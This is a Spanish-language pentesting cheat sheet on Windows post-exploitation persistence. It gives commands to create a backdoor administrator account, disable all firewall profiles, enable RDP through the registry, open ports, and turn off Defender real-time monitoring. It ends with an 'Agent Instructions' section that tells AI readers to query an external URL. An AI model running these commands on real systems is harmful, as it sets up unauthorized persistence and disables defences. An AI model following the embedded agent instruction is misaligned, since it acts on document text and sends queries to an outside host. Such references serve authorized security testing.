# Windows

## Creación de usuario

```shell
# Creación de usuario
net user <username> <password> /add
# Incorporación de usuario a grupo "administradores" (Permite RDP)
net localgroup Administrators <username> /add
# Incorporación de usuario a grupo "usuarios de administración remota" (Permite WinRM)
net localgroup "Remote Management Users" <username> /add
```

## Firewall

### Estado

```shell
netsh firewall show state
netsh advfirewall show allprofiles
```

### Desactivar

```shell
# Símbolo del sistema (cmd)
## desactivar todos los perfiles
netsh advfirewall set allprofiles state off
## desactivar por perfil
netsh advfirewall set currentprofile state off
netsh advfirewall set domainprofile state off
netsh advfirewall set privateprofile state off
netsh advfirewall set publicprofile state off

# PowerShell
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
```

### Apertura de puerto

```shell
netsh advfirewall firewall add rule name="Puerto TCP XXXX" dir=in action=allow protocol=TCP localport=<port>
```

### 3389/TCP (RDP) <a href="#firewall-3389-tcp-rdp" id="firewall-3389-tcp-rdp"></a>

```shell
# Revisión de existencia de puerto 3389/TCP abierto
netstat -an | findstr :3389
# Revisión de reglas actuales del firewall
netsh firewall show config
# Habilitación de servicio Terminal Server
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# Incorporación de regla en firewall de apertura de puerto 3389/TCP
netsh firewall add portopening TCP 3389 "Remote Desktop Protocol"
```

## Microsoft Defender

Deshabilitar la protección en tiempo real.

```powershell
Set-MpPreference -DisableRealtimeMonitoring $true
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentesting.mrw0l05zyn.cl/post-explotacion/persistencia/windows.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.